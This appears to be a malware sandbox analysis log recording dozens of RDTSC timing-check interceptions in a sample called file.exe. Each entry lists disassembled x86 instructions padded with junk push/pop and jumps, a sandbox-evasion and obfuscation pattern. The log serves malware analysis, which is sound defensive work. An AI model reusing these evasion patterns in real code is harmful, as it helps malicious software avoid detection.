Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B4A6 second address: 90B4E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007FFBC8B2DA96h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FFBC8B2DA98h 0x00000023 jmp 00007FFBC8B2DA9Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB11 second address: 90DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB17 second address: 90DB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB1B second address: 90DB2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB2A second address: 90DB3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB3B second address: 90DB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DB45 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FFBC8B2DA9Fh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FFBC8B2DAA6h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007FFBC8B2DAA3h 0x00000020 jmp 00007FFBC8B2DA9Dh 0x00000025 pop eax 0x00000026 jmp 00007FFBC8B2DA9Ah 0x0000002b push dword ptr [ebp+122D0595h] 0x00000031 mov dword ptr [ebp+122D30BCh], ecx 0x00000037 call dword ptr [ebp+122D1DD7h] 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D189Fh], edi 0x00000044 xor eax, eax 0x00000046 jmp 00007FFBC8B2DAA0h 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f mov dword ptr [ebp+122D189Fh], esi 0x00000055 mov dword ptr [ebp+122D39AAh], eax 0x0000005b jmp 00007FFBC8B2DA9Ch 0x00000060 jmp 00007FFBC8B2DAA7h 0x00000065 mov esi, 0000003Ch 0x0000006a jmp 00007FFBC8B2DAA9h 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 jmp 00007FFBC8B2DAA6h 0x00000078 clc 0x00000079 lodsw 0x0000007b stc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 clc 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D189Fh], edx 0x0000008b nop 0x0000008c push esi 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DBE7 second address: 90DC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FFBC91A3BE7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jp 00007FFBC91A3BE0h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE3h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DC3C second address: 90DC65 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC8B2DA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DC65 second address: 90DD08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 and edi, dword ptr [ebp+122D37CEh] 0x0000000f add esi, dword ptr [ebp+122D3746h] 0x00000015 push 00000003h 0x00000017 mov edx, dword ptr [ebp+122D3826h] 0x0000001d push 00000000h 0x0000001f jmp 00007FFBC91A3BE6h 0x00000024 push 00000003h 0x00000026 mov edx, dword ptr [ebp+122D3A66h] 0x0000002c push 9506531Fh 0x00000031 je 00007FFBC91A3BEDh 0x00000037 push esi 0x00000038 jmp 00007FFBC91A3BE5h 0x0000003d pop esi 0x0000003e add dword ptr [esp], 2AF9ACE1h 0x00000045 mov edi, 0E020BDAh 0x0000004a lea ebx, dword ptr [ebp+1244FA57h] 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FFBC91A3BD8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov edi, dword ptr [ebp+122D1F7Eh] 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DD08 second address: 90DD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DD0C second address: 90DD16 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DD16 second address: 90DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DAA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DDDA second address: 90DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DDDE second address: 90DE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007FFBC8B2DA98h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFBC8B2DA9Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE0F second address: 90DE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FFBC91A3BD8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE24 second address: 90DE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE47 second address: 90DE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE58 second address: 90DE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DE5C second address: 90DEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BDCh 0x0000000f jnp 00007FFBC91A3BD6h 0x00000015 popad 0x00000016 pop eax 0x00000017 jmp 00007FFBC91A3BDBh 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D3956h] 0x00000024 mov di, si 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D36A2h], edi 0x0000002f push 00000003h 0x00000031 call 00007FFBC91A3BE1h 0x00000036 je 00007FFBC91A3BEFh 0x0000003c jmp 00007FFBC91A3BE9h 0x00000041 pop edx 0x00000042 push 8F5C633Eh 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a je 00007FFBC91A3BD6h 0x00000050 pop ebx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DEDC second address: 90DEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DEF9 second address: 90DF2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4F5C633Eh 0x00000013 lea ebx, dword ptr [ebp+1244FA60h] 0x00000019 mov cl, ah 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FFBC91A3BE6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFB2 second address: 90DFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFC8 second address: 90DFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFCC second address: 90DFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d clc 0x0000000e pop edi 0x0000000f mov dword ptr [ebp+122D2499h], ebx 0x00000015 popad 0x00000016 push 00000000h 0x00000018 sub edi, dword ptr [ebp+122D1FE8h] 0x0000001e push 4B40D591h 0x00000023 pushad 0x00000024 jl 00007FFBC8B2DA9Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DFF8 second address: 90E06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FFBC91A3BD6h 0x0000000b jns 00007FFBC91A3BD6h 0x00000011 popad 0x00000012 popad 0x00000013 xor dword ptr [esp], 4B40D511h 0x0000001a sbb edx, 3EFCA9F4h 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D24A8h], esi 0x00000028 push 00000000h 0x0000002a jmp 00007FFBC91A3BE4h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FFBC91A3BD8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b xor cl, FFFFFFFAh 0x0000004e push E06D08B2h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FFBC91A3BD6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90E06A second address: 90E087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E5BA second address: 92E5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E5BF second address: 92E5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E5C7 second address: 92E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 902198 second address: 90219C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90219C second address: 9021A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92C4C9 second address: 92C4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92C4D1 second address: 92C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92C4D5 second address: 92C4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92CF1D second address: 92CF36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BDBh 0x0000000d ja 00007FFBC91A3BD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D0A7 second address: 92D0AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D0AC second address: 92D0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FFBC91A3BDEh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D213 second address: 92D236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DAA8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D236 second address: 92D23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D23A second address: 92D25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC8B2DAA4h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D25A second address: 92D25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D3B0 second address: 92D3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFBC8B2DAA2h 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA6h 0x00000011 ja 00007FFBC8B2DA96h 0x00000017 jo 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D3F0 second address: 92D3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D6B0 second address: 92D6DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFBC8B2DAA0h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DDEF second address: 92DDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DDF4 second address: 92DE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 jno 00007FFBC8B2DA96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DE17 second address: 92DE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DF40 second address: 92DF6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FFBC8B2DAA9h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DF6F second address: 92DF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E123 second address: 92E12D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E12D second address: 92E13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FFBC91A3BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E13B second address: 92E14D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FFBC8B2DAA2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E14D second address: 92E15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FFBC91A3BD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9314AC second address: 9314E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DAAFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Ch 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 903CDC second address: 903CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933E94 second address: 933EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFBC8B2DA9Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F9CD6 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B348 second address: 93B366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B366 second address: 93B36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B4C3 second address: 93B4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B4C8 second address: 93B4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B4D4 second address: 93B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B8E1 second address: 93B8F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BDDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B8F5 second address: 93B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BACC second address: 93BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BAD2 second address: 93BAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BAD6 second address: 93BADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BADA second address: 93BB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DAA8h 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB12 second address: 93BB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB16 second address: 93BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB22 second address: 93BB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB26 second address: 93BB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BC74 second address: 93BC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C5EA second address: 93C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C764 second address: 93C76D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D65F second address: 93D666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D666 second address: 93D670 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D71F second address: 93D73E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnp 00007FFBC8B2DA9Ch 0x00000013 mov dword ptr [ebp+122D32D9h], edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D73E second address: 93D742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93DC5C second address: 93DC62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E58F second address: 93E593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E593 second address: 93E597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
